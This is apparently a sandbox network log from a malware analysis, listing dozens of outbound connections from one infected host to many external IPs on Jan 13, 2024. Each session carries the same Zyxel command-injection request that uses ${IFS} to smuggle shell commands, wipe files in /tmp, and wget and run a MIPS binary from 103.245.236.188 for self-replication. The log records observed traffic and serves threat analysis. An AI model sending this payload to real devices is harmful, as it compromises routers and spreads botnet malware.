                                    Jan 13, 2024 19:02:03.735641956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    574192.168.2.1349820110.158.215.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:03.735707998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    575192.168.2.1338394163.101.66.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:04.741189003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    576192.168.2.13559264.8.130.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:04.741274118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    577192.168.2.1357476146.193.138.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745690107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    578192.168.2.135866638.101.120.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745733023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    579192.168.2.1359220177.148.67.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745748997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    580192.168.2.1337058195.119.44.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745779037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    581192.168.2.135944437.184.149.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745814085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    582192.168.2.135247659.234.48.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745855093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    583192.168.2.133492263.189.16.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745933056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    584192.168.2.1333348183.38.69.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:05.745991945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    585192.168.2.1360718196.142.207.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:06.750463009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    586192.168.2.1354552102.153.105.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:06.750540972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    587192.168.2.1348376151.62.239.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754354954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    588192.168.2.133596867.118.174.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754415989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    589192.168.2.134122869.79.231.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754484892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    590192.168.2.133731091.129.158.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754487038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    591192.168.2.135879446.161.61.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754511118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    592192.168.2.134286483.212.104.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754571915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    593192.168.2.1360930195.157.205.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754611015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    594192.168.2.134058076.77.85.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754646063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    595192.168.2.134210280.182.2.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754676104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    596192.168.2.135547642.153.84.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754726887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    597192.168.2.134688037.138.57.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754766941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    598192.168.2.1337906176.106.252.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754798889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    599192.168.2.1345030157.141.156.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754837036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    600192.168.2.133918061.24.228.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754857063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    601192.168.2.1356058114.73.79.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754893064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    602192.168.2.1334516173.26.213.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754940033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    603192.168.2.1335828179.46.199.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.754987001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    604192.168.2.135975668.74.22.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.755024910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    605192.168.2.1333284196.129.125.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.755053997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    606192.168.2.1335374208.213.82.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.755345106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    607192.168.2.1359708198.98.86.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:07.755397081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    608192.168.2.134797074.163.57.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759423971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    609192.168.2.1350968156.5.184.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759444952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    610192.168.2.1351188105.249.217.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759488106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    611192.168.2.1351168159.157.98.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759553909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    612192.168.2.135468450.176.234.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759613037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    613192.168.2.135574412.51.27.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759629011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    614192.168.2.135718419.115.151.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759625912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    615192.168.2.1359356186.96.69.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759651899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    616192.168.2.1347396159.193.247.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759720087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    617192.168.2.133560282.89.0.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759749889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    618192.168.2.1343900187.6.175.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759892941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    619192.168.2.1350114129.53.223.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.759952068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    620192.168.2.134310661.72.1.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:08.760063887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    621192.168.2.1338520209.32.41.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767693996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    622192.168.2.135176493.111.193.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767721891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    623192.168.2.1353912122.81.180.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767756939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    624192.168.2.133945446.179.47.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767793894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    625192.168.2.1350146116.178.72.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767848015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    626192.168.2.13602005.49.71.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767929077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    627192.168.2.134874491.0.6.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.767973900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    628192.168.2.1338104166.77.69.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768021107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    629192.168.2.133829896.127.125.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768053055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    630192.168.2.13591642.130.87.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768124104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    631192.168.2.1347170169.176.253.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768157959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    632192.168.2.1359674124.85.141.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768203020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    633192.168.2.1350994171.69.3.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768237114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    634192.168.2.1360718170.188.223.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768292904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    635192.168.2.1349438196.237.159.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768326044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    636192.168.2.1355104213.146.166.125443
                                    TimestampBytes transferredDirectionData
